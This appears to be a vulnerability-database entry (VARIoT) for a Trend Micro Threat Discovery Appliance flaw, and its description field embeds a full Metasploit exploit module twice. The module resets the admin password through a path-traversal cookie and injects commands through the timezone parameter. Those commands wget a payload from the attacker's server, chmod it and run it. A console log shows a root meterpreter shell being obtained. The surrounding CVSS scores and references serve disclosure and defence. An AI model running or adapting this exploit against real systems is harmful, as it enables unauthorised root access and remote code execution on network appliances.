var-201704-0342
Vulnerability from variot
A command execution flaw on the Trend Micro Threat Discovery Appliance 2.6.1062r1 exists with the timezone parameter in the admin_sys_time.cgi interface. TrendMicroThreatDiscoveryAppliance is the next generation network monitoring device. The TrendMicroThreatDiscoveryApplianceadmin_sys_time.cgi interface handles security holes in the timezone parameter. A remote attacker can exploit a vulnerability to submit a special request to execute arbitrary commands. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).
Note: You have the option to use the authentication bypass or not since it requires
that the server is rebooted. The password reset will render the authentication useless.
Typically, if an administrator cant login, they will bounce the box. Therefore, this
module performs a heart beat request until the box is bounced and then attempts to login
and to perform the command injection. This module has been tested on version 2.6.1062r1
of the appliance.
},
'Author' =>
[
'mr_me <steventhomasseeley@gmail.com>', # vuln + msf
'Roberto Suggi Liverani @malerisch', # vuln + msf
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://asciinema.org/a/112480'], # demo
[ 'CVE', '2016-7552'], # auth bypass
[ 'CVE', '2016-7547'], # cmdi
],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
},
'Targets' =>
[
[ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10 2017'))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),
], self.class)
end
def check if do_login res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'), 'cookie' => @cookie, 'method' => 'GET', }, 1) if res and res.code == 200 and res.body =~ /About Trend Micro/ version = "#{$1}" if res.body =~ /var ver_str = new String("(.*)")/ case version when /2.6.1062/ return Exploit::CheckCode::Vulnerable end end end return Exploit::CheckCode::Safe end
def exploit if datastore['AUTHBYPASS'] print_status("Bypassing authentication...") if reset_password print_good("The password has been reset!") print_status("Waiting for the administrator to reboot...") pwn_after_reboot end else if do_login pwn else fail_with(Failure::NoAccess, "Authentication failed") end end end
def reset_password c = "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'), 'method' => 'GET', 'cookie' => c, })
if res and res.code == 200 and res.headers.to_s =~ /Backtrace/
return true
end
return false
end
def pwn start_http_server print_good("Logged in") download_exec end
def pwn_after_reboot @rebooted = false while !@rebooted if do_login @rebooted = true pwn end end end
def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end
def start_http_server @pl = generate_payload_exe @elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
@service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def exec(cmd) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'), 'cookie' => @cookie, 'method' => 'POST', 'vars_post' => { 'act' => 'save', 'timezone' => cmd, } }, 1) end
def download_exec
@bd = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
exec("|wget #{@service_url} -O /tmp/#{@bd}
")
exec("|chmod 755 /tmp/#{@bd}
")
exec("|/tmp/#{@bd}
")
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
def do_login
begin
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),
'method' => 'POST',
'vars_post' => {
'passwd' => datastore['PASSWORD'],
'isCookieEnable' => 1,
}
})
# these are needed due to the reboot
rescue Rex::ConnectionRefused
return false
rescue Rex::ConnectionTimeout
return false
end
if login and login.code == 200 and login.body =~ /frame\.cgi/
@cookie = "session_id=#{$1};" if login.get_cookies =~ /session_id=(.*);/
return true
end
return false
end end =begin saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc [] Processing scripts/trend.rc for ERB directives. resource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi resource (scripts/trend.rc)> set RHOST 192.168.100.2 RHOST => 192.168.100.2 resource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp resource (scripts/trend.rc)> set LHOST 192.168.100.13 LHOST => 192.168.100.13 resource (scripts/trend.rc)> exploit [] Exploit running as background job.
[] Started reverse TCP handler on 192.168.100.13:4444 [] Bypassing authentication... msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > [+] The password has been reset! [] Waiting for the reboot... [] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... [] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP [] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP [+] Logged in [] 192.168.100.2:443 - Sending the payload to the server... [] Transmitting intermediate stager for over-sized stage...(105 bytes) [] Sending stage (1495599 bytes) to 192.168.100.2 [] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500 [+] Deleted /tmp/rpNDXQZTB [*] Server stopped.
msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1 [*] Starting interaction with 1...
meterpreter > shell Process 3846 created. Channel 1 created.
BusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands.
/bin/sh: can't access tty; job control turned off /opt/TrendMicro/MinorityReport/www/cgi-bin # id id uid=0(root) gid=0(root) /opt/TrendMicro/MinorityReport/www/cgi-bin # =end
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0342", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "threat discovery appliance", "scope": "eq", "trust": 1.6, "vendor": "trendmicro", "version": "2.6.1062" }, { "model": "threat discovery appliance 2.6.1062r1", "scope": null, "trust": 0.9, "vendor": "trend micro", "version": null }, { "model": "threat discovery appliance", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "2.6.1062r1" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "BID", "id": "97610" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "CNNVD", "id": "CNNVD-201704-726" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:trendmicro:threat_discovery_appliance", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008321" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Rapid7", "sources": [ { "db": "BID", "id": "97610" } ], "trust": 0.3 }, "cve": "CVE-2016-7547", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-7547", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-05855", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-7547", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-7547", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2016-7547", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2017-05855", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201704-726", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-7547", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "CNNVD", "id": "CNNVD-201704-726" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A command execution flaw on the Trend Micro Threat Discovery Appliance 2.6.1062r1 exists with the timezone parameter in the admin_sys_time.cgi interface. TrendMicroThreatDiscoveryAppliance is the next generation network monitoring device. The TrendMicroThreatDiscoveryApplianceadmin_sys_time.cgi interface handles security holes in the timezone parameter. A remote attacker can exploit a vulnerability to submit a special request to execute arbitrary commands. \n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to \u0027admin\u0027 upon a reboot (CVE-2016-7552). \n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless. \n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heart beat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027mr_me \u003csteventhomasseeley@gmail.com\u003e\u0027, # vuln + msf\n \u0027Roberto Suggi Liverani @malerisch\u0027, # vuln + msf\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [ \u0027URL\u0027, \u0027https://asciinema.org/a/112480\u0027], # demo\n [ \u0027CVE\u0027, \u00272016-7552\u0027], # auth bypass\n [ \u0027CVE\u0027, \u00272016-7547\u0027], # cmdi\n ],\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027Arch\u0027 =\u003e ARCH_X86,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Payload\u0027 =\u003e\n {\n \u0027DisableNops\u0027 =\u003e true,\n },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Trend Micro Threat Discovery Appliance 2.6.1062r1\u0027, {} ]\n ],\n \u0027DefaultOptions\u0027 =\u003e\n {\n \u0027SSL\u0027 =\u003e true\n },\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Apr 10 2017\u0027))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The target URI\u0027, \u0027/\u0027]),\n OptString.new(\u0027PASSWORD\u0027, [true, \u0027The password to authenticate with\u0027, \u0027admin\u0027]),\n OptPort.new(\u0027SRVPORT\u0027, [ true, \u0027The daemon port to listen on\u0027, 1337 ]),\n OptBool.new(\u0027AUTHBYPASS\u0027, [ true, \u0027Bypass the authentication\u0027, true ]),\n\n ], self.class)\n end\n\n def check\n if do_login\n res = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin/about.cgi\u0027),\n \u0027cookie\u0027 =\u003e @cookie,\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n }, 1)\n if res and res.code == 200 and res.body =~ /About Trend Micro/\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\n case version\n when /2.6.1062/\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if datastore[\u0027AUTHBYPASS\u0027]\n print_status(\"Bypassing authentication...\")\n if reset_password\n print_good(\"The password has been reset!\")\n print_status(\"Waiting for the administrator to reboot...\")\n pwn_after_reboot\n end\n else\n if do_login\n pwn\n else\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n end\n end\n\n def reset_password\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n res = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin/logoff.cgi\u0027),\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027cookie\u0027 =\u003e c,\n })\n\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\n return true\n end\n return false\n end\n\n def pwn\n start_http_server\n print_good(\"Logged in\")\n download_exec\n end\n\n def pwn_after_reboot\n @rebooted = false\n while !@rebooted\n if do_login\n @rebooted = true\n pwn\n end\n end\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn\u0027t ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = \u0027/\u0027 + downfile\n\n # do not use SSL for the attacking web server\n if datastore[\u0027SSL\u0027]\n ssl_restore = true\n datastore[\u0027SSL\u0027] = false\n end\n\n if (datastore[\u0027SRVHOST\u0027] == \"0.0.0.0\" or datastore[\u0027SRVHOST\u0027] == \"::\")\n srv_host = datastore[\u0027URIHOST\u0027] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore[\u0027SRVHOST\u0027]\n end\n\n @service_url = \u0027http://\u0027 + srv_host + \u0027:\u0027 + datastore[\u0027SRVPORT\u0027].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({\u0027Uri\u0027 =\u003e {\n \u0027Proc\u0027 =\u003e Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n \u0027Path\u0027 =\u003e resource_uri\n }})\n\n datastore[\u0027SSL\u0027] = true if ssl_restore\n connect\n end\n\n def exec(cmd)\n send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin/admin_sys_time.cgi\u0027),\n \u0027cookie\u0027 =\u003e @cookie,\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e {\n \u0027act\u0027 =\u003e \u0027save\u0027,\n \u0027timezone\u0027 =\u003e cmd,\n }\n }, 1)\n end\n\n def download_exec\n @bd = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\n exec(\"|`/tmp/#{@bd}`\")\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n\n def do_login\n\n begin\n login = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin/logon.cgi\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e {\n \u0027passwd\u0027 =\u003e datastore[\u0027PASSWORD\u0027],\n \u0027isCookieEnable\u0027 =\u003e 1,\n }\n })\n\n # these are needed due to the reboot\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\n return true\n end\n return false\n end\nend\n=begin\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \n[*] Processing scripts/trend.rc for ERB directives. \nresource (scripts/trend.rc)\u003e use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\nresource (scripts/trend.rc)\u003e set RHOST 192.168.100.2\nRHOST =\u003e 192.168.100.2\nresource (scripts/trend.rc)\u003e set payload linux/x86/meterpreter/reverse_tcp\npayload =\u003e linux/x86/meterpreter/reverse_tcp\nresource (scripts/trend.rc)\u003e set LHOST 192.168.100.13\nLHOST =\u003e 192.168.100.13\nresource (scripts/trend.rc)\u003e exploit\n[*] Exploit running as background job. \n\n[*] Started reverse TCP handler on 192.168.100.13:4444 \n[*] Bypassing authentication... \nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) \u003e \n[+] The password has been reset!\n[*] Waiting for the reboot... \n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... \n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\n[+] Logged in\n[*] 192.168.100.2:443 - Sending the payload to the server... \n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\n[*] Sending stage (1495599 bytes) to 192.168.100.2\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -\u003e 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\n[+] Deleted /tmp/rpNDXQZTB\n[*] Server stopped. \n\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) \u003e sessions -i 1\n[*] Starting interaction with 1... \n\nmeterpreter \u003e shell\nProcess 3846 created. \nChannel 1 created. \n\n\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\nEnter \u0027help\u0027 for a list of built-in commands. \n\n/bin/sh: can\u0027t access tty; job control turned off\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\nid\nuid=0(root) gid=0(root)\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\n=end\n", "sources": [ { "db": "NVD", "id": "CVE-2016-7547" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "BID", "id": "97610" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "PACKETSTORM", "id": "142201" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-7547", "trust": 3.5 }, { "db": "BID", "id": "97610", "trust": 2.0 }, { "db": "JVNDB", "id": "JVNDB-2016-008321", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2017-05855", "trust": 0.6 }, { "db": "NSFOCUS", "id": "36421", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201704-726", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "142201", "trust": 0.2 }, { "db": "VULMON", "id": "CVE-2016-7547", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "BID", "id": "97610" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "PACKETSTORM", "id": "142201" }, { "db": "CNNVD", "id": "CNNVD-201704-726" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "id": "VAR-201704-0342", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" } ], "trust": 0.06 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" } ] }, "last_update_date": "2024-11-23T22:52:31.793000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.trendmicro.co.jp/jp/index.html" }, { "title": "TrendMicroThreatDiscoveryAppliance command to execute a patch for the vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/93111" }, { "title": "Trend Micro Threat Discovery Appliance Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=70210" }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/qazbnm456/awesome-cve-poc " }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/lnick2023/nicenice " }, { "title": "Awesome CVE PoC", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "CNNVD", "id": "CNNVD-201704-726" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-361", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/97610" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7547" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7547" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/36421" }, { "trust": 0.3, "url": "http://www.trend.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/361.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://packetstormsecurity.com/files/142201/trend-micro-threat-discovery-appliance-admin_sys_time.cgi-remote-command-execution.html" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/modules/exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi" }, { "trust": 0.1, "url": "https://asciinema.org/a/112480\u0027]," }, { "trust": 0.1, "url": "http://0.0.0.0:1337/nndbuoumuknxp" }, { "trust": 0.1, "url": "https://github.com/rapid7/metasploit-framework" }, { "trust": 0.1, "url": "http://192.168.100.13:1337/nndbuoumuknxp" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7552" }, { "trust": 0.1, "url": "http://\u0027" }, { "trust": 0.1, "url": "http://metasploit.com/download" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "BID", "id": "97610" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "PACKETSTORM", "id": "142201" }, { "db": "CNNVD", "id": "CNNVD-201704-726" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-05855" }, { "db": "VULMON", "id": "CVE-2016-7547" }, { "db": "BID", "id": "97610" }, { "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "db": "PACKETSTORM", "id": "142201" }, { "db": "CNNVD", "id": "CNNVD-201704-726" }, { "db": "NVD", "id": "CVE-2016-7547" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-05-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-05855" }, { "date": "2017-04-12T00:00:00", "db": "VULMON", "id": "CVE-2016-7547" }, { "date": "2017-04-12T00:00:00", "db": "BID", "id": "97610" }, { "date": "2017-05-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "date": "2017-04-19T00:44:12", "db": "PACKETSTORM", "id": "142201" }, { "date": "2017-04-12T00:00:00", "db": "CNNVD", "id": "CNNVD-201704-726" }, { "date": "2017-04-12T10:59:00.183000", "db": "NVD", "id": "CVE-2016-7547" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-05-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-05855" }, { "date": "2017-04-17T00:00:00", "db": "VULMON", "id": "CVE-2016-7547" }, { "date": "2017-04-18T00:05:00", "db": "BID", "id": "97610" }, { "date": "2017-05-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-008321" }, { "date": "2017-05-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201704-726" }, { "date": "2024-11-21T02:58:11.557000", "db": "NVD", "id": "CVE-2016-7547" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201704-726" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Trend Micro Threat Discovery Appliance Time and status vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008321" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", 